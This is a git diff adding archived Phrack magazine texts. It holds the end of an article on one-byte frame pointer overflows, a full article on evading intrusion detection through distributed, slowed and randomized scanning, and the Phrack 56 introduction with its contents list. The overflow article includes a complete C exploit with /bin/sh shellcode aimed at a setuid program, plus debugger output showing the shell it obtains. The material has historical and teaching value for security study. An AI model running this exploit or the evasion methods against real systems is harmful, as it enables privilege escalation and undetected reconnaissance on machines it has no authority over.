+	0x804813e <func+10>:    movl   $0x0,0xfffffefc(%ebp)
+	0x8048148 <func+20>:    cmpl   $0x100,0xfffffefc(%ebp)
+	0x8048152 <func+30>:    jle    0x8048158 <func+36>
+	0x8048154 <func+32>:    jmp    0x804817c <func+72>
+	0x8048156 <func+34>:    leal   (%esi),%esi
+	0x8048158 <func+36>:    leal   0xffffff00(%ebp),%edx
+	0x804815e <func+42>:    movl   %edx,%eax
+	0x8048160 <func+44>:    addl   0xfffffefc(%ebp),%eax
+	0x8048166 <func+50>:    movl   0x8(%ebp),%edx
+	0x8048169 <func+53>:    addl   0xfffffefc(%ebp),%edx
+	0x804816f <func+59>:    movb   (%edx),%cl
+	0x8048171 <func+61>:    movb   %cl,(%eax)
+	0x8048173 <func+63>:    incl   0xfffffefc(%ebp)
+	0x8048179 <func+69>:    jmp    0x8048148 <func+20>
+	0x804817b <func+71>:    nop
+	0x804817c <func+72>:    movl   %ebp,%esp
+	0x804817e <func+74>:    popl   %ebp
+	0x804817f <func+75>:    ret
+	End of assembler dump.
+	(gdb) break *0x804813d
+	Breakpoint 1 at 0x804813d
+	(gdb) c
+	Continuing.
+
+	Breakpoint 1, 0x804813d in func ()
+	(gdb) info register esp
+	esp            0xbffffc60       0xbffffc60
+	(gdb)
+
+Bingo.  We now have %esp just after the func's frame have been activated.
+From this value, we can now guess that our buffer will be located at address
+0xbffffc60 + 0x04 (size of 'int i') = 0xbffffc64, and that the pointer to our
+shellcode will be placed at address 0xbffffc64 + 0x100 (size of 'char
+buffer[256]') - 0x04 (size of our pointer) = 0xbffffd60.
+
+
+----[  Time to attack
+
+Having those values will enable us to write a full version of the exploit,
+including the shellcode, the shellcode pointer and the overwriting byte.  The
+value we need to overwrite the saved %ebp's last byte will be 0x60 - 0x04
+= 0x5c since, as you remember, we pop %ebp juste before returning from main().
+These 4 bytes will compensate for %ebp being removed from the stack.  As for
+the pointer to our shellcode, we don't really need to have it point to an exact
+address.  All we need is to make the processor return in the middle of the
+nops between the beginning of the overflowed buffer (0xbffffc64) and our
+shellcode (0xbffffc64 - sizeof(shellcode)), like in a usual buffer overflow.
+Let's use 0xbffffc74.
+
+	ipdev:~/tests$ cat > exp.c
+	#include <stdio.h>
+	#include <unistd.h>
+
+	char sc_linux[] =
+	        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
+	        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
+	        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
+	        "\xd7\xff\xff\xff/bin/sh";
+
+	main()
+	{
+        	int i, j;
+        	char buffer[1024];
+
+        	bzero(&buffer, 1024);
+        	for (i=0;i<=(252-sizeof(sc_linux));i++)
+        	{
+                	buffer[i] = 0x90;
+        	}
+        	for (j=0,i=i;j<(sizeof(sc_linux)-1);i++,j++)
+        	{
+        	        buffer[i] = sc_linux[j];
+        	}
+        	buffer[i++] = 0x74; /*
+       		buffer[i++] = 0xfc;  * Address of our buffer
+        	buffer[i++] = 0xff;  *
+        	buffer[i++] = 0xbf;  */
+        	buffer[i++] = 0x5c;
+
+        	execl("./suid", "suid", buffer, NULL);
+
+	}
+	^D
+	ipdev:~/tests$ gcc exp.c -o exp
+	ipdev:~/tests$ ./exp
+	bash$
+
+Great!  Let's take a better look at what really happened.  Although we built
+our exploit around the theory I just put in this paper, it would be nice
+to watch everything get tied together.  You can stop reading right now if
+you understood everything explained previously, and start looking for
+vulnerabilities.
+
+	ipdev:~/tests$ gdb --exec=exp --symbols=suid
+	...
+	(gdb) run
+	Starting program: /home/klog/tests/exp
+
+	Program received signal SIGTRAP, Trace/breakpoint trap.
+	0x8048090 in ___crt_dummy__ ()
+	(gdb)
+
+Let's first put some breakpoints to watch our careful exploitation of our
+suid program occur in front of our eyes.  We should try to follow the value of
+our overwritten frame pointer until our shellcode starts getting executed.
+
+	(gdb) disassemble func
+	Dump of assembler code for function func:
+	0x8048134 <func>:       pushl  %ebp
+	0x8048135 <func+1>:     movl   %esp,%ebp
+	0x8048137 <func+3>:     subl   $0x104,%esp
+	0x804813d <func+9>:     nop
+	0x804813e <func+10>:    movl   $0x0,0xfffffefc(%ebp)
+	0x8048148 <func+20>:    cmpl   $0x100,0xfffffefc(%ebp)
+	0x8048152 <func+30>:    jle    0x8048158 <func+36>
+	0x8048154 <func+32>:    jmp    0x804817c <func+72>
+	0x8048156 <func+34>:    leal   (%esi),%esi	
+	0x8048158 <func+36>:    leal   0xffffff00(%ebp),%edx
+	0x804815e <func+42>:    movl   %edx,%eax
+	0x8048160 <func+44>:    addl   0xfffffefc(%ebp),%eax
+	0x8048166 <func+50>:    movl   0x8(%ebp),%edx
+	0x8048169 <func+53>:    addl   0xfffffefc(%ebp),%edx
+	0x804816f <func+59>:    movb   (%edx),%cl
+	0x8048171 <func+61>:    movb   %cl,(%eax)
+	0x8048173 <func+63>:    incl   0xfffffefc(%ebp)
+	0x8048179 <func+69>:    jmp    0x8048148 <func+20>
+	0x804817b <func+71>:    nop
+	0x804817c <func+72>:    movl   %ebp,%esp
+	0x804817e <func+74>:    popl   %ebp
+	0x804817f <func+75>:    ret
+	End of assembler dump.
+	(gdb) break *0x804817e
+	Breakpoint 1 at 0x804817e
+	(gdb) break *0x804817f
+	Breakpoint 2 at 0x804817f
+	(gdb)
+
+Those first breakpoints will enable us to monitor the content of %ebp before
+and after being poped from the stack.  These values will correspond to the
+original and overwritten values.
+
+	(gdb) disassemble main
+	Dump of assembler code for function main:
+	0x8048180 <main>:       pushl  %ebp
+	0x8048181 <main+1>:     movl   %esp,%ebp
+	0x8048183 <main+3>:     cmpl   $0x1,0x8(%ebp)
+	0x8048187 <main+7>:     jg     0x80481a0 <main+32>
+	0x8048189 <main+9>:     pushl  $0x8058ad8
+	0x804818e <main+14>:    call   0x80481b8 <_IO_printf>
+	0x8048193 <main+19>:    addl   $0x4,%esp
+	0x8048196 <main+22>:    pushl  $0xffffffff
+	0x8048198 <main+24>:    call   0x804d598 <exit>
+	0x804819d <main+29>:    addl   $0x4,%esp
+	0x80481a0 <main+32>:    movl   0xc(%ebp),%eax
+	0x80481a3 <main+35>:    addl   $0x4,%eax
+	0x80481a6 <main+38>:    movl   (%eax),%edx
+	0x80481a8 <main+40>:    pushl  %edx
+	0x80481a9 <main+41>:    call   0x8048134 <func>
+	0x80481ae <main+46>:    addl   $0x4,%esp
+	0x80481b1 <main+49>:    movl   %ebp,%esp
+	0x80481b3 <main+51>:    popl   %ebp
+	0x80481b4 <main+52>:    ret
+	0x80481b5 <main+53>:    nop
+	0x80481b6 <main+54>:    nop
+	0x80481b7 <main+55>:    nop
+	End of assembler dump.
+	(gdb) break *0x80481b3
+	Breakpoint 3 at 0x80481b3
+	(gdb) break *0x80481b4
+	Breakpoint 4 at 0x80481b4
+	(gdb)
+
+Here we want to monitor the transfer of our overwritten %ebp to %esp and
+the content of %esp until a return from main() occurs.  Let's run the program.
+
+	(gdb) c
+	Continuing.
+
+	Breakpoint 1, 0x804817e in func ()
+	(gdb) info reg ebp
+	ebp            0xbffffd64       0xbffffd64
+	(gdb) c
+	Continuing.
+
+	Breakpoint 2, 0x804817f in func ()
+	(gdb) info reg ebp
+	ebp            0xbffffd5c       0xbffffd5c
+	(gdb) c
+	Continuing.
+
+	Breakpoint 3, 0x80481b3 in main ()
+	(gdb) info reg esp
+	esp            0xbffffd5c       0xbffffd5c
+	(gdb) c
+	Continuing.
+
+	Breakpoint 4, 0x80481b4 in main ()
+	(gdb) info reg esp
+	esp            0xbffffd60       0xbffffd60
+	(gdb)
+
+At first, we see the original value of %ebp.  After being poped from the
+stack, we can see it being replaced by the one which has been overwritten
+by the last byte of our overflowing string, 0x5c.  After that, %ebp is
+moved to %esp, and finally, after %ebp is being poped from the stack again,
+%esp is incremented by 4 bytes. It gives us the final value of 0xbffffd60.
+Let's take a look at what stands there.
+
+	(gdb) x 0xbffffd60
+	0xbffffd60 <__collate_table+3086619092>:        0xbffffc74
+	(gdb) x/10 0xbffffc74
+	0xbffffc74 <__collate_table+3086618856>:        0x90909090      
+	0x90909090	0x90909090       0x90909090
+	0xbffffc84 <__collate_table+3086618872>:        0x90909090      
+	0x90909090	0x90909090       0x90909090
+	0xbffffc94 <__collate_table+3086618888>:        0x90909090      
+	0x90909090
+	(gdb)
+
+We can see that 0xbffffd60 is the actual address of a pointer pointing in the
+middle of the nops just before of our shellcode.  When the processor will
+return from main(), it will pop this pointer into %eip, and jump at the exact
+address of 0xbffffc74.  This is when our shellcode will be executed.
+
+	(gdb) c
+	Continuing.
+
+	Program received signal SIGTRAP, Trace/breakpoint trap.
+	0x40000990 in ?? ()
+	(gdb) c
+	Continuing.
+	bash$ 
+
+
+----[  Conclusions
+
+Although the technique seems nice, some problems remain unresolved.
+Altering a program's execution flow with only one byte of overwriting data
+is, for sure, possible, but under what conditions?  As a matter of fact,
+reproducing the exploitation context can be a hard task in a hostile
+environment, or worst, on a remote host.  It would require us to guess the
+exact stack size of our target process.  To this problem we add the necessity
+of our overflowed buffer to be right next to the saved frame pointer, which
+means it must be the first variable to be declared in its function.  Needless
+to say, padding must also be taken in consideration.  And what about attacking
+big endian architectures?  We cannot afford to be only able to overwrite the
+most significant byte of the frame pointer, unless we have the ability to
+reach this altered address...
+
+Conclusions could be drawn from this nearly impossible to exploit situation.
+Although I would be surprised to hear of anyone having applied this technique
+to a real world vulnerability, it for sure proves us that there is no such
+thing as a big or small overflow, nor is there such thing as a big or small
+vulnerability.  Any flaw is exploitable, all you need is to find out how.
+
+Thanks to: binf, rfp, halflife, route
+
+
+----[  EOF
+
diff --git a/phrack55/9.txt b/phrack55/9.txt
new file mode 100644
index 0000000..a45a613
--- /dev/null
+++ b/phrack55/9.txt
@@ -0,0 +1,260 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 09 of 19  ]
+
+
+-------------------------[  Distributed Information Gathering  ]
+
+
+--------[  hybrid <hybrid_@hotmail.com>  ]
+
+
+----[  Overview
+
+
+Information gathering refers to the process of determining the characteristics
+of one or more remote hosts (and/or networks).  Information gathering can be
+used to construct a model of a target host, and to facilitate future
+penetration attempts.
+
+This article will discuss and justify a new model for information gathering,
+namely: distributed information gathering.
+
+The focus is on eluding detection during the information gathering stage(s) of
+an attack, particularly by NIDS (Network Intrusion Detection Systems).
+
+This article is adjunct to the superb work of both Thomas H. Ptacek and Timothy
+N. Newsham [1], and to horizon [2].
+
+Please note that I do not claim to have discovered the distributed information
+gathering methodology [3]; this article is a consolidation, discussion, and
+extrapolation of existing work.
+
+
+----[  Introduction
+
+The current methods used to perform remote information gathering are well
+documented [4], but are reiterated briefly here:
+
+I.     Host Detection
+
+Detection of the availability of a host.  The traditional method is to elicit
+an ICMP ECHO_REPLY in response to an ICMP ECHO_REQUEST, using ping(1) or
+fping(1).
+
+II.    Service Detection
+
+A.K.A. port scanning.  Detection of the availability of TCP, UDP, or RPC
+services, e.g. HTTP, DNS, NIS, etc.  Methods include SYN and FIN scanning, and
+variations thereof e.g. fragmentation scanning.
+
+III.   Network Topology Detection
+
+I know of only two methods - TTL modulation (traceroute), and record route
+(e.g. ping -R), although classical 'sniffing' is another (non-invasive) method.
+
+IV.    OS Detection
+
+A.K.A TCP/IP stack fingerprinting.  The determination of a remote OS type by
+comparison of variations in OS TCP/IP stack implementation behavior; see
+nmap(1).
+
+
+----[  Conventional Information Gathering Paradigm
+
+The conventional method of information gathering is to perform information
+gathering techniques with a 'one to one' or 'one to many' model; i.e. an
+attacker performs techniques in a (usually) linear way against either one
+target host or a logical grouping of target hosts (e.g. a subnet).
+
+Conventional information gathering is often optimized for speed, and often
+executed in parallel (e.g. nmap). 
+
+
+----[  Distributed Information Gathering Paradigm
+
+With a distributed method, information gathering is performed using a 'many to
+one' or 'many to many' model.  The attacker utilizes multiple hosts to execute
+information gathering techniques in a random, rate-limited, non-linear way.
+
+The meta-goal of distributed information gathering is to avoid detection either
+by N-IDS (network intrusion detection systems) or by human analysis (e.g.
+system administrators).
+
+Distributed information gathering techniques seek to defeat the attack
+detection heuristic employed by N-IDS'; this heuristic is explained below.
+
+
+----[  N-IDS Attack Detection Heuristic
+
+Many methods exist to perform (pseudo) real-time intrusion detection analysis
+of network traffic data, of which the two major categories are M-IDS (misuse
+detection) and A-IDS (anomaly detection).  A-IDS exist at present primarily in
+the research domain, such as at COAST [5]; M-IDS employ a signature analysis
+method (analogous in some respects to virus scanning software), and are in
+widespread use in commercial and free N-IDS.
+
+N-IDS signatures can be delineated into two categories - those that use 
+composite or atomic signatures.  Atomic signatures relate to a single "event"
+(in general, a single packet), e.g. a large packet attack / ping attack.  
+Composite signatures comprise multiple events (multiple packets), e.g. a port 
+scan or SYN flood.
+
+To detect malicious or anomalous behavior, composite signatures usually employ
+a simple equation with THRESHOLD and DELTA components.  A THRESHOLD is a simple
+integer count; a DELTA is a time duration, e.g. 6 minutes.
+
+For example, a signature for a SYN flood [6] might be:
+
+   'SYN flood detected if more than 10 SYN packets seen in under 75 seconds'
+
+Therefore in the above example, the THRESHOLD is "10 packets", and the DELTA is
+"75 seconds".
+
+
+----[  N-IDS Subversion
+
+Within each monitoring component of a N-IDS the THRESHOLD and DELTA values
+associated with each signature must be carefully configured in order to flag
+real attacks, but to explicitly not flag where no attack exists.  A 'false
+positive' is defined as the incorrect determination of an attack; a 'false
+negative' is defined as the failure to recognize an attack in progress.
+
+This process of configuration is a non-trivial "balancing act" - too little and
+the N-IDS will flag unnecessarily often (and likely be ignored), too much and
+the N-IDS will miss real attacks.
+
+Using this information, the goal of distributed information gathering is
+therefore not only to gather information, but also to induce a false negative
+'state' in any N-IDS monitoring a target.
+
+The techniques employed by distributed information gathering to subvert N-IDS
+are outlined below.
+
+
+----[  Distributed Information Gathering Techniques
+
+I.     Co-operation
+
+By employing a 'many to one' or 'many to many' model, multiple hosts can be
+used together to perform information gathering.  Multiple source hosts will
+make the correlation and detection duties of a N-IDS more complex.
+
+Co-operation seeks to subvert the THRESHOLD component of a N-IDS attack
+recognition signature.
+
+II.    Time Dilation
+
+By extending (or 'time stretching') the duration of an attack (particularly
+the host and service detection phases), we hope to 'fall below' the DELTA used
+by N-IDS' to detect an attack.
+
+III.   Randomization
+
+Packets used to perform information gathering, such as an ICMP datagram or a
+SYN packet, should employ randomness where possible (within the constraints of
+the relevant RFC definition), e.g. random TCP sequence and acknowledgement
+numbers, random source TCP port, random IP id, etc.  Libnet [7] is an excellent
+portable packet generation library that includes randomization functionality.
+
+Randomization should also be utilized in the timing between packets sent, and
+the order of hosts and/or ports scanned.  For example, a port scan of ports 53,
+111, and 23 with non-regular timing between each port probed (e.g. between 6
+and 60 minutes) is preferential to a linear, incremental scan, executed within
+a few seconds.
+
+In the IP header, I suggest randomization of IP ID and possibly TTL; within the
+TCP header the source port, sequence number, and acknowledgement number (where
+possible); and within the UDP header the source port.
+
+The algorithm used to perform randomization must be carefully selected, else
+the properties of the algorithm may be recordable as a signature themselves!
+There are multiple documents which discuss randomization for security, of 
+which [8] is a good place to start.
+
+
+----[  Advantages
+
+The advantages in employing a distributed information gathering methodology are
+therefore:
+
+I.     Stealth
+
+By employing co-operation, time dilation, and randomization techniques we hope
+to elude N-IDS detection.
+
+II.    Correlation Information
+
+The acquisition of multiple 'points of view' of a target enables a more
+complete model of the target to be constructed, including multiple route and
+timing information.
+
+III.   Pervasive Information Gathering
+
+The 'r-box' countermeasures (such as dynamic router or firewall configuration)
+employed by certain N-IDS becomes less effective when multiple source hosts are
+employed.
+
+
+----[  N-IDS Evolution
+
+How will N-IDS evolve to counter distributed information gathering?  It is
+likely that detection of distributed information gathering will be available
+only as a retrospective function, opposed to (pseudo) real time.  Logs from
+multiple N-IDS agents must be centralized and cross-correlated before
+distributed information gathering attacks can be detected.
+ 
+In a large enterprise (for example a military, government, or large corporation
+installation) this process of event consolidation must be considered a
+non-trivial task.
+
+
+----[  Commercial Information Gathering Software a.k.a. Vulnerability Scanners
+
+
+There exists several advantages in using a distributed scanning model for
+commercial vendors of network vulnerability scanning technology.  A distributed
+model would enable localized 'zones of authority' (i.e. delegation of
+authority), could gather information behind NAT (and firewalls, where
+configured), and overcome network topology specific bandwidth restrictions.
+
+At this time I am aware of no commercial (or free) vulnerability scanners that
+employ a distributed architecture.
+
+
+----[  Conclusion
+
+Distributed information gathering is an extrapolation and logical evolution of
+the existing traditional information gathering paradigm.  It's primary goal
+is to elude detection by automated (N-IDS) or human sources.
+
+If you choose to employ distributed information gathering techniques, you
+must trade immediacy of results against stealth.
+
+
+----[  References
+
+
+  [1] - "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion
+        Detection", Thomas H. Ptacek & Timothy N. Newsham, January 1998.
+
+  [2] - "Defeating Sniffers and Intrusion Detection Systems", horizon, Phrack
+        Magazine, Volume 8 Issue 54 Article 10 of 12, Dec 25th 1998.
+
+  [3] - "SHADOW Indications Technical Analysis - Coordinated Attacks and
+        Probes", Stephen Northcutt & Tim Aldrich, Sep 21 1998.
+
+  [4] - "The Art of Port Scanning", Fyodor, Phrack Magazine, Volume 7 Issue 51
+        article 11 of 17, September 01 1997.
+
+  [5] - COAST, http://www.cs.purdue.edu/coast/ids
+
+  [6] - "Project Neptune", daemon9 / route / infinity, Phrack Magazine, Volume
+        7 Issue Forty-Eight File 13 of 18.
+
+  [7] - Libnet, route, http://www.packetfactory.net/libnet
+
+  [8] - RFC 1750, "Randomness Recommendations for Security", December 1994.
+
+  [9] - Libpcap, LBNL Network Research Group, http://ee.lbl.gov
+
+
+----[  EOF
diff --git a/phrack56/1.txt b/phrack56/1.txt
new file mode 100644
index 0000000..02491ff
--- /dev/null
+++ b/phrack56/1.txt
@@ -0,0 +1,225 @@
++---=0x5b 0x72 0x65 0x67 0x69 0x73 0x74 0x65 0x72 0x65 0x64 0x20 0x20 0x68=---+
+|           a_                            _y        88888888      ad8888ba,   |
+|           MM                            MM[      88            8P'    "Y8   |
+|   __ __    M _,   __  __  ____     __ _  B[___   88  ----     d8            |
+|   0Mm0M0_  MMMM_  #MmMMm  0MM0y  _MMMMF  #[MMM   88a8PPPP8b,  88,dd888bb,   |
+|    MP ~~0  Mf "M   BM' Y  ~  BF  BP ~MF  #_#F    PP"     `8b  88P'    `8b   |
+|    0    M  M   M   4f     m000F  M   ~'  #MM              d8  88       d8   |
+|    #y  _M  M   M   #l    4M  ]F  M_   _  #MMk    Y8a     a8P  88a     a8P   |
+|    0MmmMf yMg mMs m0mmm  4&  M0r R0mmmP mMf~Mmr  "Y88888P"    "Y88888P"     |
+|    M~""   """ "*` 9MMP^   PM"~P'  ~M"~  "^  "^'                             |
+|    M                                                                        |
+|    M                                                                        |
+|   MMM#                                                                      |
++---=0x65 0x78 0x20 0x20 0x6f 0x66 0x66 0x65 0x6e 0x64 0x65 0x72 0x7a 0x5b=---+
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x01[0x10]
+
+|-------------------------- I N T R O D U C T I O N --------------------------|
+|-----------------------------------------------------------------------------|
+|------------------------- J'envoie la sauce!  b00m! -------------------------|
+
+In much of the same SPECTACULAR fashion you've come to expect, here iz your
+56th god damned issue of Phrack mutherfuckin' Magazine.  Late?  Nono.  Late
+would imply that there exists a publishing schedule of some sort.  We now know
+this really isn't the case.  So, in actuality, this issue may in fact be
+early.  We have our best people looking into it...
+
+<SOAPBOX-THAT-HAS-NOTHING-TO-DO-WITH-COMPUTERS-OR-SECURITY-OR-HACKING>
+
+Riotz and protestz and retardz, OH MY!
+
+JESUS CHRIST PEOPLE.  This whole Elian Gonzalez debacle can just goto hell.
+And of course I mean that figuratively speaking.  I'm not so callous or jaded
+as to wish harm on an innocent child, but I speak for a significant majority of
+people when I say:
+
+                        "Enough is e-fucking-nough".
+
+Since November of 1999, the U.S. Government has entangled itself in an
+embroiled political, social and economic mess that just needs to END.
+
+Ok, here's the whole story in a nutshell.  Around Thanksgiving of last year,
+this fisherman finds a kid floating in an innertube a few miles from Pompano
+Beach, FL.  The fisherman does what any God-fearing Samaritan would do: he
+pulls the kid out of the water and takes him to the hospital.  So the saga
+began...
+
+And here's how it should end:
+
+Elian should go back to Cuba with his biological father.  Sure, Cuba sucks,
+but this is a six-year-old child whose father wants him to come home.  Since
+when is it the US Government's job to act as social services for a sovereign
+Communist Country family?  Oh, by the way, this has cost the U.S. Taxpayer
+more than $580,000 so far.  And it's not over.
+
+Anyhow...
+
+As it happens, apparently Elian has some (distant) relatives in the US who
+managed to sneak out of Cuba. Congratulations.  Good for them.  So somehow,
+these people seem to think they have a stake in all this.  Wonderful.  Kids
+come running for the great taste of fifteen minutes of fame!
+
+Ok.  And what about these relatives?  Well, they're nutz, for one.  Second of
+all, they're hardly "close" relativez.  What, that one nutty chick is his
+second cousin?  Does that even count?  Great-uncles, and their brothers aside,
+a boy's FATHER is his FATHER.  Crikey.  If this was *my* kid, I'd be like: "Ok,
+junior, get in the fucking car, we're going home".
+
+Do any of these superfluous people realize what they're doing?  Nevermind the
+fact that this little boy is probably going to be scarred in some horribly
+repressed fashion, and all the money this is costing...  Wait no..  Actually
+that's pretty much the crux of the issue.  Well, my issue with it.  I'm just
+sick of it.  Gawd.
+
+And what the hell is up with all the rioters?  Thuggish lowbrows seen on CNN
+yelling "FUCK THIS COUNTRY" (after the INS snatch).  Hey guess what retard?  If
+you don't like, go the fuck back to Cuba.  Like you even know what you're upset
+about.  You just wanted an excuse to break shit and burn things (which they did
+do).
+
+AND FOR THE LOVE OF GOD, WHAT ABOUT THE FISHERMAN?  WHAT STAKE COULD HE POSSIBLY
+STILL HAVE IN ALL THIS?  Keep stretching those 15 minutez there buddy!  I must
+say though, the open weeping on national television was very nice.  "The
+Sensitive Fisherman".  Rite.  GET BACK OUT THERE AND CATCH ME SOME DOLPHIN-SAFE
+TUNA.
+
+Oh, and did I mention that someone named "Jesus Lizarazo" registered
+eliangonzalez.com?  Who the crap hell iz that?
+
+Stop the insanity.
+
+</SOAPBOX>
+
+Oh, by the by, there'z obviously been an overall format change.  Nothing too
+major but I got real bored with the old one.  I think the racing stripez add a
+nice touch.  Oh, and I hope you like Hex.  Coz I shure do.  Sorry.  No Phrack
+World News this time around.  But how many of you guyz actually read it anyway?
+
+*shrug*
+
+Enjoy.
+
+|-In Fucking Charge Guy ----------------------------------------------- route-|
+|-Associate Editor ---------------------------------------------------- kamee-|
+|-Vhost Trooper ------------------------------------------------------- felix-|
+|-Phrack World Newz -------------------------------------------------- <NULL>-|
+|-ASCII art from 1989 and Caucasian MixMaster Kid --------------------- swern-|
+|-F*cking N*tz ------------------------------------------------------- silvio-|
+|-Elite --------------------------------------------------------------- nihil-|
+|-Unbearably Bearish ------------------------------------------------- NASDAQ-|
+|-Microsoft / 2 ----------------------------------------- Two huge monopolies-|
+|-Prom Queen ------------------------------------------------------------- dk-|
+|-Kisses Like a Girl ------------------------------------------------- shinex-|
+|-Special Thankz ---------------------------------------------- sasha, twitch-|
+|-Shout Outs ----------------------- incr, frontline, no_ana, alia, miff, udp-|
+
+Phrack Magazine Volume 10 Number 56, May 01, 2000.  ISSN 1068-1035
+Contents Copyright (c) 2000 Phrack Magazine.  All Rights Reserved.  Nothing may
+be reproduced in whole or in part without written permission from the editor
+in chief.  Phrack Magazine is made available to the public, as often as
+possible, free of charge.  Go nuts people.  And stop bitching.  You don't pay
+for this shit.
+
+|--------------- C O N T A C T   P H R A C K   M A G A Z I N E ---------------|
+
+Editor in Chief:    route@phrack.com
+Submissions:        route@phrack.com
+Commentary:         loopback@phrack.com
+Phrack World News:  disorder@phrack.com
+
+|-----------------------------------------------------------------------------|
+
+Submissions may be encrypted with the following PGP key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: PGPfreeware 5.0i for non-commercial use
+
+mQGiBDdmijIRBADrabrDFYw6PRDrRRZsgetOOGo8oGROn4/H7q4L7rLm7weszn4L
+8j1zY4AV4f3jFis0A/AqXPicxUHz0I3L6PzTMg11mmLbcj6wnAvr78LZ65y3Z5aA
+PEm/F7fNqAzFl9MCnUWa+53eH0TBKW7JdjpfCELeXTMLNsJREjL7f5qvyQCg/xqD
+g7dUtdIiDb7tm5DRhWqgDmED/iPUmujMt5x40bmf135vjev1Rle3nhHIe4fh58a7
+VkZOmzqz/s3LninBuWcmuyZWShVGd8Hhd758yt41Xe/YHtEW4jSzYtE/1woYmp0K
+sZnFt+zIVAEm1mcVVV9+qrpEKVmbBLTR/oa+6A+t5/hFUjriTpAQUGF0xLzXNLYu
+c7cSA/0Q0rziq5xyuPbtUMKWE9zhxrt/SwfhunWx/n2vm2q9eFPfWqb9fDVuFrtv
+gwpaPVJ2CbM6F6c21pNGqm8zrSO8TYzgTScBKM80wn7ase3RBth36++N/Oq4Zczm
+froc9Och7qkgdZ7TkPCuorsyMc1169DXBxBSGfiQ85ylUYrbrLQRTWlrZSBELiBT
+Y2hpZmZtYW6JAEsEEBECAAsFAjdmijIECwMBAgAKCRAWHraAlbJmQSdiAKCjaUrs
+InxTXebFlAX5aUmdEKsD1wCfRZMfzv3BvQMKa6Rmbwlfzat0DFS5Ag0EN2aKMxAI
+APZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mU
+rfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VH
+MGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2
+azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMh
+LLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+c
+fL2JSyIZJrqrol7DVekyCzsAAgIH/jCj4drT8VSrxI2N3MlgkiQOMcaGLE8L3qbZ
+jyiVolqIeH+NEwyWzCMRVsFTHWfQroPrF30UsezIXuF0GPVZvlzSSB/fA1ND0CBz
+9uK9oSYPwI8i513nMaF03bLWlB07dBqiDUcKgfm/eyPGu5SP+3QhVaERDnBOdolZ
+J6t3ER8GRgjNUyxXOMaZ4SWdB7IaZVph1/PyEgLLA3DxfYjsPp5/WRJcSbK3NZDG
+cNlmozX5WUM7cHwEHzmYSRDujs/e3aJLZPa7stS9YGYVPZcjxQoE6wr+jx4Vjps4
+pW+f6iWvWEfYnYRJqzwe8318rX6OojqHttaQs8xNEqvPOTfkt12JAD8DBRg3Zooz
+Fh62gJWyZkERAj61AJ41XyTBasgKKYlOVnI4mWZYJemQIQCgiqaTkhpM6xCnqKD9
+BKnOvDsNc44=
+=IQ3Y
+-----END PGP PUBLIC KEY BLOCK-----
+
+phrack:~# head -20 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of the
+ *  editors and contributors, truthful and accurate.  When possible, all facts
+ *  are checked, all code is compiled.  However, we are not omniscient (hell,
+ *  we don't even get paid).  It is entirely possible something contained
+ *  within this publication is incorrect in some way.  If this is the case,
+ *  please drop us some email so that we can correct it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
+ *  entirely stupid (or illegal) things people may do with the information
+ *  contained herein.  Phrack is a compendium of knowledge, wisdom, wit, and
+ *  sass.  We neither advocate, condone nor participate in any sort of illicit
+ *  behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in the
+ *  articles of Phrack Magazine are intellectual property of their authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+|--------------------- T A B L E   O F   C O N T E N T S ---------------------|
+
+0x01 Introduction                                     Phrack Staff      0x18 K
+0x02 Phrack Loopback                                  Phrack Staff      0x64 K
+0x03 Phrack Line Noise                                various           0x6c K
+0x04 Phrack Prophile                                  Phrack Staff      0x1c K
+0x05 Bypassing StackGuard and StackShield             Bulba and Kil3r   0x36 K
+0x06 Project Area52                                   Jitsu-Disk...     0x50 K
+0x07 Shared Library Redirection via ELF PLT Infection Silvio            0x32 K
+0x08 Smashing C++ VPTRs                               rix               0x6c K
+0x09 Backdooring binary objects                       klog              0x46 K
+0x0a Things To Do in Cisco Land When You're Dead      gaius	        0x26 K
+0x0b A Strict Anomaly Detection Model for IDS         sasha / beetle    0x28 K
+0x0c Distributed Tools                                sasha / lifeline  0x3e K
+0x0d Introduction to PAM                              Bryan Ericson     0x20 K
+0x0e Exploiting Non-adjacent Memory Spaces            twitch            0x38 K
+0x0f Writing MIPS/Irix shellcode                      scut              0x3a K
+0x10 Phrack Magazine Extraction Utility               Phrack Staff      0x2a K
+
+                                                      Total            0x3ba K
+
+|-----------------------------------------------------------------------------|
+
+    "...IMHO it hasn't improved. Sure, some technical aspects of the magazine
+     have improved, but it's mostly a dry technical journal these days.  The
+     personality that used to characterize Phrack is pretty much non-existant,
+     and the editorial style has shifted towards one of `I know more about
+     buffer overflows than you` arrogance. Take a look at the Phrack Loopback
+     responses during the first 10 years to the recent ones. A much higher
+     percentage of responses are along the lines of `you're an idiot, we at
+     Phrack Staff are much smarter than you.`..."
+
+     - Trepidity <delirium4u@theoffspring.net> apparently still bitter at not
+       being chosen as Mrs. Phrack 2000.
+
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/10.txt b/phrack56/10.txt
new file mode 100644
index 0000000..1f6a463
--- /dev/null
+++ b/phrack56/10.txt
@@ -0,0 +1,537 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x0a[0x10]
+
